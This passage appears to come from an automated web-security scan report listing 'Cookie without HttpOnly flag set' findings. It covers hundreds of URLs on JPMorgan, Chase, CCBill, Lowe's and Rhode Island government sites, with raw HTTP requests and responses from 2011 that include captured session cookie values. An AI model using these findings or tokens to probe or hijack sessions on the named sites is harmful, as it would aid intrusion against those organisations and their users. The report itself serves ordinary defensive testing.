RQ=3763,5JCcZ,3151,57rv5,3173,5OYlT,3190,5OYlT,3238,5OYlT,3281,5JD0W,3677,5OYlT,3678,5OYlT,3754,5OYl5,985,5OYl5,1445,5OYl5,1470,5OYlT,1478,5OYl5,1513,5OYl5,1514,5OYlT,1515,5OYl5,2398,5OYlT,2570,5OYlT,1267,53br0,2831,5OYl5,2848,5OYlT,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,5OYlT,2921,5OYlT,2887,53br0,3468,53br2,1042,5OYlT,1182,5OYlT,1271,5OYlT,1273,5OYlT,1286,5OYlT,1339,5OYlT,1909,5OYl5,2170,5JCdD,1211,5OYl5,2739,5JCfo,3218,5JCeW,3246,5JCyZ,3425,5OYlT,3491,5JDlu,3387,5OYlT,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27; domain=.imiclk.com; path=/; expires=Wed, 11-Jul-2012 20:06:40 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi/r.cgi?m=3&mid=GQuHAQvv&did=games HTTP/1.1
Host: www.imiclk.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OL8U=2-2-C853333EC652166FAF7E3D0062149675759E1277B74C3E759400B711FCF64130-AD2295ECB4683944460A9D5F04A88CAF4EB4854AF4BF19B0D63B2248D4643BCA; CH=36067,00000,32766,00000,18654,53bro,18661,53bro,24785,53c27,34637,00000,18653,53bro,33114,00000,37746,5MfXs,35701,00000,37991,00000,36760,00000,38066,00000,19029,58T8w,28363,53br0,34606,00000,28882,5OYl5,30627,00000,34030,00000,32680,00000,19036,58T8w,35153,00000,34985,00000,30628,00000,24783,53c27,34600,00000,28881,5OYl5,34628,00000,32620,5MfXs,24775,00000,34986,00000,22244,53br0,34505,00000,34604,00000,19037,58T8w,24782,53c27,28873,5OYl5,34698,00000,34506,00000; RQ=3763,5JCcZ,3151,57rv5,3173,53c1h,3190,53c1h,3238,53bro,3281,5JD0W,3677,53bro,3678,53c1h,3754,5OYl5,985,5OYl5,1445,5OYl5,1470,53c1h,1478,5OYl5,1513,5OYl5,1514,53bro,1515,5OYl5,2398,53bro,2570,53c1h,1267,53br0,2831,5OYl5,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,1042,58T8w,1182,58T8w,1271,58T8w,1273,58T8w,1286,58T8w,1339,58T8w,1909,5OYl5,2170,5JCdD,1211,5OYl5,2739,5JCfo,3218,5JCeW,3246,5JCyZ,3425,58T8w,3491,5JDlu,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27; YU=3e170243b30558bee730f315249abaeb-5OYl5

Response

11. Cookie without HttpOnly flag set previous next
There are 376 instances of this issue:

http://511.dot.ri.gov/hb/
https://iblogin.jpmorgan.com/sso/action/federateLogin
https://iblogin.jpmorgan.com/sso/action/web_ForgotUsername
https://iblogin.jpmorgan.com/sso/action/web_NeedHelp
https://locator.chase.com/
https://locator.chase.com/__utm.gif
https://locator.chase.com/favicon.ico
https://locator.chase.com/images/IconWeblinking.gif
https://locator.chase.com/images/advbg.gif
https://locator.chase.com/images/advdash.gif
https://locator.chase.com/images/advhelp_btn.gif
https://locator.chase.com/images/advsearch_btn.gif
https://locator.chase.com/images/arrow_white_down.gif
https://locator.chase.com/images/arrow_white_up.gif
https://locator.chase.com/images/bgMainContent.gif
https://locator.chase.com/images/blue_phone.gif
https://locator.chase.com/images/chase_atms.jpg
https://locator.chase.com/images/chase_home.gif
https://locator.chase.com/images/close.gif
https://locator.chase.com/images/contextualHelpIcon.gif
https://locator.chase.com/images/dblue_left_bg_top.gif
https://locator.chase.com/images/dblue_right_bg_top.gif
https://locator.chase.com/images/loadingAnimation.gif
https://locator.chase.com/images/nav_tab_active.gif
https://locator.chase.com/images/nav_tab_bg.gif
https://locator.chase.com/images/nav_tab_hover.gif
https://locator.chase.com/images/nav_tab_side.gif
https://locator.chase.com/images/search_green.gif
https://locator.chase.com/images/searchcapbg.png
https://locator.chase.com/images/textbox_bg.gif
https://locator.chase.com/jsp/SearchPage.jsp
https://locator.chase.com/jsp/content/balloon.css
https://locator.chase.com/jsp/content/chase_main.css
https://locator.chase.com/jsp/content/chrome.css
https://locator.chase.com/jsp/content/unknown_card_page.css
https://locator.chase.com/scripts/functions.js
https://locator.chase.com/scripts/idle-timer.js
https://locator.chase.com/scripts/jquery-1.2.6.pack.js
https://locator.chase.com/scripts/jquery.idletimeout.js
https://locator.chase.com/scripts/ligeo.js
https://locator.chase.com/urchin.js
http://login.dotomi.com/ucm/UCMController
http://sales.liveperson.net/visitor/addons/deploy.asp
https://www.chase.com/index.jsp
http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay
http://www.jpmorgan.com/pages/jpmorgan
http://www2.tmc.state.ri.us/
http://511.dot.ri.gov/hb
http://ad.trafficmp.com/a/bpix
http://ad.yieldmanager.com/pixel
https://admin.ccbill.com/
https://admin.ccbill.com/adminBanners/blank.gif
https://admin.ccbill.com/ccbillLogin.css
https://admin.ccbill.com/ext-2.2/adapter/ext/ext-base.js
https://admin.ccbill.com/ext-2.2/custom/combos.css
https://admin.ccbill.com/ext-2.2/custom/login.js
https://admin.ccbill.com/ext-2.2/custom/password.js
https://admin.ccbill.com/ext-2.2/ext-all.js
https://admin.ccbill.com/ext-2.2/resources/css/ext-all.css
https://admin.ccbill.com/ext-2.2/resources/images/default/button/btn-sprite.gif
https://admin.ccbill.com/ext-2.2/resources/images/default/form/text-bg.gif
https://admin.ccbill.com/ext-2.2/resources/images/default/form/trigger.gif
https://admin.ccbill.com/ext-2.2/resources/images/default/shadow-c.png
https://admin.ccbill.com/ext-2.2/resources/images/default/shadow-lr.png
https://admin.ccbill.com/ext-2.2/resources/images/default/shadow.png
https://admin.ccbill.com/favicon.ico
https://admin.ccbill.com/images/ccb_AffiliateSystemBanner.gif
https://admin.ccbill.com/images/ccb_AffiliateSystemBkg.jpg
https://admin.ccbill.com/images/ccb_ClientSupportAreaBkg.jpg
https://admin.ccbill.com/images/ccb_LearnMoreBtn.gif
https://admin.ccbill.com/images/ccb_LoginBoxBottom.gif
https://admin.ccbill.com/images/ccb_LoginBoxDiv.gif
https://admin.ccbill.com/images/ccb_LoginBoxLeft.gif
https://admin.ccbill.com/images/ccb_LoginBoxRight.gif
https://admin.ccbill.com/images/ccb_LoginBoxTop.gif
https://admin.ccbill.com/images/ccb_OnlineSupportBox1Bkg.jpg
https://admin.ccbill.com/images/ccb_OnlineSupportBox2Bkg.jpg
https://admin.ccbill.com/images/ccb_OnlineSupportBox3Bkg.jpg
https://admin.ccbill.com/images/ccb_SupportBarBottom.gif
https://admin.ccbill.com/images/ccb_SupportBarDiv.gif
https://admin.ccbill.com/images/ccb_SupportBarLeft.gif
https://admin.ccbill.com/images/ccb_SupportBarRight.gif
https://admin.ccbill.com/images/ccb_System5Banner.gif
https://admin.ccbill.com/images/ccb_System5Bkg.jpg
https://admin.ccbill.com/js/AC_RunActiveContent.js
https://admin.ccbill.com/js/liveChat.js
https://admin.ccbill.com/js/loginJSTools.js
https://admin.ccbill.com/login.cgi
https://admin.ccbill.com/loginIndex.cgi
https://admin.ccbill.com/loginMM.cgi
https://admin.ccbill.com/style/css/ccbill_style.css
https://admin.ccbill.com/style/css/default_style.css
https://admin.ccbill.com/style/css/images/text-bg.gif
https://admin.ccbill.com/style/css/password.css
https://admin.ccbill.com/style/images/bg_img.jpg
https://admin.ccbill.com/style/images/ccbillLogo.jpg
https://admin.ccbill.com/style/images/contactCCBillBtn.png
https://admin.ccbill.com/style/images/email_icon.png
https://admin.ccbill.com/style/images/exclamation_icon.png
https://admin.ccbill.com/style/images/s.gif
https://admin.ccbill.com/style/images/section_bg.png
https://admin.ccbill.com/style/images/warning_icon.png
https://affiliateadmin.ccbill.com/
https://affiliateadmin.ccbill.com/ccbill.css
https://affiliateadmin.ccbill.com/favicon.ico
http://ak1.abmr.net/is/www.burstnet.com
http://ak1.abmr.net/is/www.imiclk.com
http://ak1.abmr.net/is/www.lowes.com
http://akamai.mathtag.com/sync/img
http://akamai.turn.com/r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/C87B49F9CF448D1C1BA69C0215C3FF64
http://at.amgdgt.com/ads/
http://b.scorecardresearch.com/b
http://bh.contextweb.com/bh/set.aspx
http://blog.katango.com/
http://bstats.adbrite.com/click/bstats.gif
http://gw-services.vtrenz.net/WebCookies/iMAWebSyncIDAppender.js
http://idcs.interclick.com/Segment.aspx
http://image2.pubmatic.com/AdServer/Pug
http://images.apple.com/global/nav/styles/navigation.css
http://images.apple.com/global/scripts/apple_core.js
http://images.apple.com/global/scripts/browserdetect.js
http://images.apple.com/global/scripts/lib/prototype.js
http://images.apple.com/global/scripts/lib/scriptaculous.js
http://images.apple.com/global/scripts/search_decorator.js
http://images.apple.com/global/styles/base.css
http://images.apple.com/global/styles/itunesmodule.css
http://images.apple.com/itunes/home/styles/home.css
http://images.apple.com/itunes/styles/itunes.css
http://jpmorgan.com/
http://leadback.advertising.com/adcedge/lb
https://mm.jpmorgan.com/css/menu.css
https://mm.jpmorgan.com/css/morganmarkets.css
https://mm.jpmorgan.com/css/yui/base.css
https://mm.jpmorgan.com/css/yui/button.css
https://mm.jpmorgan.com/css/yui/container.css
https://mm.jpmorgan.com/css/yui/reset-fonts-grids.css
https://mm.jpmorgan.com/css/yui/sprite.png
https://mm.jpmorgan.com/css/yui/tabview.css
https://mm.jpmorgan.com/css/yui/treeview.css
https://mm.jpmorgan.com/favicon.ico
https://mm.jpmorgan.com/images/JPM_logo.gif
https://mm.jpmorgan.com/images/Morgan_Markets_logo.gif
https://mm.jpmorgan.com/images/backgrounds/btn_hover_center_bg.png
https://mm.jpmorgan.com/images/btn_center_bg.gif
https://mm.jpmorgan.com/images/btn_hover_center_bg.gif
https://mm.jpmorgan.com/images/btn_hover_left_side.gif
https://mm.jpmorgan.com/images/btn_hover_right_side.gif
https://mm.jpmorgan.com/images/btn_left_side.gif
https://mm.jpmorgan.com/images/btn_right_side.gif
https://mm.jpmorgan.com/images/icons/attention.gif
https://mm.jpmorgan.com/images/menu_bg_img.jpg
https://mm.jpmorgan.com/index.jsp
https://mm.jpmorgan.com/js/dropdowns.js
https://mm.jpmorgan.com/js/feedback.js
https://mm.jpmorgan.com/js/gecFunctions.js
https://mm.jpmorgan.com/js/menu.js
https://mm.jpmorgan.com/js/personalisation.js
https://mm.jpmorgan.com/js/portalBondIndex.js
https://mm.jpmorgan.com/js/portlet.js
https://mm.jpmorgan.com/js/yui/button-min.js
https://mm.jpmorgan.com/js/yui/connection-min.js
https://mm.jpmorgan.com/js/yui/container-min.js
https://mm.jpmorgan.com/js/yui/element-min.js
https://mm.jpmorgan.com/js/yui/event-delegate-min.js
https://mm.jpmorgan.com/js/yui/selector-min.js
https://mm.jpmorgan.com/js/yui/tabview-min.js
https://mm.jpmorgan.com/js/yui/treeview-min.js
https://mm.jpmorgan.com/js/yui/yahoo-dom-event.js
http://pixel.mathtag.com/data/img
http://pixel.quantserve.com/pixel
http://pixel.rubiconproject.com/d.php
http://pixel.rubiconproject.com/tap.php
http://r.turn.com/r/beacon
http://sales.liveperson.net/hc/57386690/
http://sales.liveperson.net/hc/57386690/
http://store.popcap.com/cart.php
https://store.popcap.com/payment.php
https://support.ccbill.com/
https://support.ccbill.com/js/ga.js
https://support.ccbill.com/style/css/base.css
https://support.ccbill.com/style/css/consumers.css
https://support.ccbill.com/style/img/background/body.png
https://support.ccbill.com/style/img/background/body_container.png
https://support.ccbill.com/style/img/background/main.png
https://support.ccbill.com/style/img/buttons/btn_search.png
https://support.ccbill.com/style/img/icons/bullet_square_blk.gif
https://support.ccbill.com/style/img/sprites/page_elements.png
http://wallst.jpmorganchase.com/chase/services/MultiQuote/MultiQuote.asp
http://web.me.com/serverhodeisland/Serve_RI/Home.html
http://webtrends.chase.com/dcsa2cd6l000008m66hyi0bxa_9k6w/dcs.gif
http://www.burstnet.com/enlightn/3599//E519/
http://www.burstnet.com/enlightn/3893//392A/
http://www.burstnet.com/enlightn/5158//2CB4/
http://www.burstnet.com/enlightn/8117//3E06/
http://www.burstnet.com/enlightn/8171/99D2/
http://www.ct.gov/demhs/site/default.asp
http://www.imiclk.com/cgi/r.cgi
http://www.jpmorgan.com/
http://www.jpmorgan.com/cm/BlobServer
http://www.jpmorgan.com/cm/Satellite
http://www.jpmorgan.com/css/lightview.css
http://www.jpmorgan.com/emetrics/s_code.js
http://www.jpmorgan.com/favicon.ico
http://www.jpmorgan.com/images/background_subpage.jpg
http://www.jpmorgan.com/images/bkgrd_container_2008.jpg
http://www.jpmorgan.com/images/bkgrd_content_lob.gif
http://www.jpmorgan.com/images/bkgrd_rr_generic.jpg
http://www.jpmorgan.com/images/bkgrd_sitemap.gif
http://www.jpmorgan.com/images/client_pixel.jpg
http://www.jpmorgan.com/images/dotted_line.jpg
http://www.jpmorgan.com/images/email_grey.gif
http://www.jpmorgan.com/images/footer_pixel.gif
http://www.jpmorgan.com/images/headers/hdr_client_logon_2008.jpg
http://www.jpmorgan.com/images/headers/hdr_news.jpg
http://www.jpmorgan.com/images/homepage/2008_flash/img/home_corporations.jpg
http://www.jpmorgan.com/images/homepage/2008_flash/img/home_fininst.jpg
http://www.jpmorgan.com/images/homepage/2008_flash/img/home_individuals.jpg
http://www.jpmorgan.com/images/homepage/2008_flash/img/home_publicsector.jpg
http://www.jpmorgan.com/images/homepage/2008_flash/img/home_smallbus.jpg
http://www.jpmorgan.com/images/homepage/shadow_bt_820.png
http://www.jpmorgan.com/images/homepage/shadow_lt.png
http://www.jpmorgan.com/images/homepage/shadow_rt.png
http://www.jpmorgan.com/images/language_chooser_pixel.gif
http://www.jpmorgan.com/images/lightview/close_large.png
http://www.jpmorgan.com/images/lightview/close_small.png
http://www.jpmorgan.com/images/lightview/controller_close.png
http://www.jpmorgan.com/images/lightview/controller_next.png
http://www.jpmorgan.com/images/lightview/controller_prev.png
http://www.jpmorgan.com/images/lightview/controller_slideshow_play.png
http://www.jpmorgan.com/images/lightview/controller_slideshow_stop.png
http://www.jpmorgan.com/images/lightview/inner_next.png
http://www.jpmorgan.com/images/lightview/inner_prev.png
http://www.jpmorgan.com/images/lightview/inner_slideshow_play.png
http://www.jpmorgan.com/images/lightview/inner_slideshow_stop.png
http://www.jpmorgan.com/images/lightview/loading.gif
http://www.jpmorgan.com/images/lightview/next.png
http://www.jpmorgan.com/images/lightview/prev.png
http://www.jpmorgan.com/images/lightview/topclose.png
http://www.jpmorgan.com/images/logo_jpm_2008.gif
http://www.jpmorgan.com/images/logo_jpm_2008_bw.gif
http://www.jpmorgan.com/images/menu_tab_left.jpg
http://www.jpmorgan.com/images/menu_tab_right.jpg
http://www.jpmorgan.com/images/more_services_arrow.gif
http://www.jpmorgan.com/images/navbar_leftcorner.gif
http://www.jpmorgan.com/images/navbar_map.gif
http://www.jpmorgan.com/images/navbar_rightcorner2.gif
http://www.jpmorgan.com/images/news_buttons.jpg
http://www.jpmorgan.com/images/news_gradient_cell.jpg
http://www.jpmorgan.com/images/print_grey.gif
http://www.jpmorgan.com/images/scnd_body_arrow.gif
http://www.jpmorgan.com/images/scnd_client_logon.jpg
http://www.jpmorgan.com/images/scnd_client_pixel.jpg
http://www.jpmorgan.com/images/scnd_menu_tab.jpg
http://www.jpmorgan.com/images/scnd_menu_tab_left.jpg
http://www.jpmorgan.com/images/scnd_more_services_arrow.gif
http://www.jpmorgan.com/images/scnd_onstate_arrow.jpg
http://www.jpmorgan.com/images/scnd_tab_bar_pixel.jpg
http://www.jpmorgan.com/images/scnd_vert_dottedline.gif
http://www.jpmorgan.com/images/scnd_wht_bkg.jpg
http://www.jpmorgan.com/images/thrd_client_tab_left2.jpg
http://www.jpmorgan.com/images/thrd_client_tab_right2.jpg
http://www.jpmorgan.com/images/thrd_subnav_arrow.gif
http://www.jpmorgan.com/images/thrd_subnav_dottedline.jpg
http://www.jpmorgan.com/images/thumb_am_62.jpg
http://www.jpmorgan.com/images/thumb_cb_62.jpg
http://www.jpmorgan.com/images/thumb_ib_62.jpg
http://www.jpmorgan.com/images/thumb_pb_62.jpg
http://www.jpmorgan.com/images/thumb_ts_62.jpg
http://www.jpmorgan.com/images/thumb_wss_62.jpg
http://www.jpmorgan.com/images/ts/images_2008/background_subpage.jpg
http://www.jpmorgan.com/images/ts/images_2008/footer_pixel.gif
http://www.jpmorgan.com/images/ts/images_2008/logo_jpm.gif
http://www.jpmorgan.com/images/ts/images_2008/navbar_map.gif
http://www.jpmorgan.com/images/ts/images_2008/scnd_body_arrow.gif
http://www.jpmorgan.com/images/ts/images_2008/scnd_menu_tab.jpg
http://www.jpmorgan.com/images/ts/images_2008/scnd_menu_tab_left.jpg
http://www.jpmorgan.com/images/ts/images_2008/scnd_onstate_arrow.jpg
http://www.jpmorgan.com/images/ts/images_2008/scnd_tab_bar_pixel.jpg
http://www.jpmorgan.com/images/ts/images_2008/thrd_client_tab_left2.jpg
http://www.jpmorgan.com/images/ts/images_2008/thrd_client_tab_right2.jpg
http://www.jpmorgan.com/images/ts/images_2008/thrd_subnav_arrow.gif
http://www.jpmorgan.com/images/ts/images_2008/thrd_subnav_dottedline.jpg
http://www.jpmorgan.com/images/ts/imgs/icon_arrow_up.gif
http://www.jpmorgan.com/images/ts/js/global.js
http://www.jpmorgan.com/pages/jpmorgan/am
http://www.jpmorgan.com/pages/jpmorgan/am/mediaboxarticles/WhyJPMAM
http://www.jpmorgan.com/pages/jpmorgan/am/uk
http://www.jpmorgan.com/pages/jpmorgan/am/uk/press_office
http://www.jpmorgan.com/pages/jpmorgan/am/uk/press_office/global-equity-absolute-alpha-fund-launched
http://www.jpmorgan.com/pages/jpmorgan/am/usa
http://www.jpmorgan.com/pages/jpmorgan/clientlogon
http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx
http://www.jpmorgan.com/pages/jpmorgan/private_banking
http://www.jpmorgan.com/script/jpmVideoPlayerHelper.js
http://www.jpmorgan.com/script/jquery-1.2.6.min.js
http://www.jpmorgan.com/script/jquery-1.3.2.min.js
http://www.jpmorgan.com/script/jquery.bgiframe.min.js
http://www.jpmorgan.com/script/jquery.pngFix.pack.js
http://www.jpmorgan.com/script/jquery_jpm_custom.js
http://www.jpmorgan.com/script/lightbox_support/builder.js
http://www.jpmorgan.com/script/lightbox_support/controls.js
http://www.jpmorgan.com/script/lightbox_support/dragdrop.js
http://www.jpmorgan.com/script/lightbox_support/effects.js
http://www.jpmorgan.com/script/lightbox_support/prototype.js
http://www.jpmorgan.com/script/lightbox_support/scriptaculous.js
http://www.jpmorgan.com/script/lightbox_support/slider.js
http://www.jpmorgan.com/script/lightbox_support/sound.js
http://www.jpmorgan.com/script/lightview.js
http://www.jpmorgan.com/script/swfobject.js
http://www.jpmorgan.com/tss/General/ACH_Fraud_Solutions/1159383343594
http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
http://www.jpmorgan.com/tss/Product_A-Z/Products_and_Solutions/1104848729254
http://www.lowes.com/
http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_appliances.png
http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_grills.png
http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_ope.png
http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_patiofurniture.png
http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110608_area5b_laptopimg.png
http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110616_area6b_BeatTheHeat.png
http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area2_PatioNLP.jpg
http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area3_cooling.png
http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area3_decking.png
http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area4_vanity.png
http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_control_PatioNLP.png
http://www.lowes.com/campaign/summer/2011/images/homepage/20110622_area5_background.jpg
http://www.lowes.com/campaign/summer/2011/images/homepage/20110705_area4_Clearance.png
http://www.lowes.com/campaign/summer/2011/images/homepage/20110705_area5_GiftCards.png
http://www.lowes.com/campaign/summer/2011/images/homepage/20110706_control_Flooring.png
http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area2_Flooring.jpg
http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area2_Refrigeration.jpg
http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_Bali.png
http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_OPE.png
http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_Shutters.png
http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_Tools.png
http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area6b_Organization.png
http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_control_Refrigeration.png
http://www.lowes.com/campaign/summer/2011/images/homepage/arrow_status.png
http://www.lowes.com/campaign/summer/2011/images/homepage/bullet.png
http://www.lowes.com/campaign/summer/2011/images/homepage/green_background.png
http://www.lowes.com/images/auxnav/auxnavbg.png
http://www.lowes.com/images/bg-category-li.gif
http://www.lowes.com/images/bg-page.gif
http://www.lowes.com/images/blank.gif
http://www.lowes.com/images/category-corner.png
http://www.lowes.com/images/category-right-cover.gif
http://www.lowes.com/images/cover.gif
http://www.lowes.com/images/sprites/buttons.png
http://www.lowes.com/images/sprites/global.png
http://www.lowes.com/pc_Flooring_4294934373_4294937087_
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/global/global-min.css
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/global/ie/ie-min.css
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/homepage/homepage-min.css
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/homepage/ie/ie-min.css
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/ie6-1.0.5.css
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/ie6-print.css
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/ie6.css
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main-1.0.5.css
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/print.css
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/images/lowes_logo.gif
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/global/global-min.js
http://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm
https://www.lowes.com/server-status
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js
https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm
https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm
http://www.ox.popcap.com/delivery/afr.php
https://www.ri.gov/Licensing/renewal/license.php
http://www.uscg.mil/safetylevels/levels.js
http://www7.lowes.com/eluminate
http://www7.lowes.com/eluminate

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

11.1. http://511.dot.ri.gov/hb/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://511.dot.ri.gov
Path:	/hb/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=7AAAE4CFA20D02FA44A642301503BF8A; Path=/hb

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hb/ HTTP/1.1
Host: 511.dot.ri.gov
Proxy-Connection: keep-alive
Referer: http://www2.tmc.state.ri.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.8.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; RhodeIslandNGWeb=1679163402.20480.0000

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=7AAAE4CFA20D02FA44A642301503BF8A; Path=/hb
Location: http://511.dot.ri.gov/hb/main.jsf
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Wed, 13 Jul 2011 00:33:05 GMT

11.2. https://iblogin.jpmorgan.com/sso/action/federateLogin previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://iblogin.jpmorgan.com
Path:	/sso/action/federateLogin

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=C3F5993BDA54ECF5782ED241F20F3239; Path=/sso; Secure
pajpm5=sailSession; Domain=.jpmorgan.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sso/action/federateLogin?URI=https%3a%2f%2fmm.jpmorgan.com%3a443%2ffavicon.ico&msg=+&securityLevel=0&cs=V05Mtro7P%2f8lpwB5gAv4hsgbAKM%3d HTTP/1.1
Host: iblogin.jpmorgan.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A6CB0EFBC048F9424BECBC81EE443A5; __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:30:27 GMT
Server: Apache
Set-Cookie: pajpm5=sailSession; Domain=.jpmorgan.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Set-Cookie: JSESSIONID=C3F5993BDA54ECF5782ED241F20F3239; Path=/sso; Secure
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 16407

                   <SCRIPT type="text/javascript">
<!--
   var cookieEnabled=(navigator.cookieEnabled)? true : false
   //if not IE4+ nor NS6+
   if (typeof navigator.cooki
...[SNIP]...

11.3. https://iblogin.jpmorgan.com/sso/action/web_ForgotUsername previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://iblogin.jpmorgan.com
Path:	/sso/action/web_ForgotUsername

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=E6E4CC6AA03FB89B0056EE20A6421FE8; Path=/sso; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /sso/action/web_ForgotUsername HTTP/1.1
Host: iblogin.jpmorgan.com
Connection: keep-alive
Referer: https://iblogin.jpmorgan.com/sso/action/web_GetForgotUsername?customInfoIndex=3
Content-Length: 30
Cache-Control: max-age=0
Origin: https://iblogin.jpmorgan.com
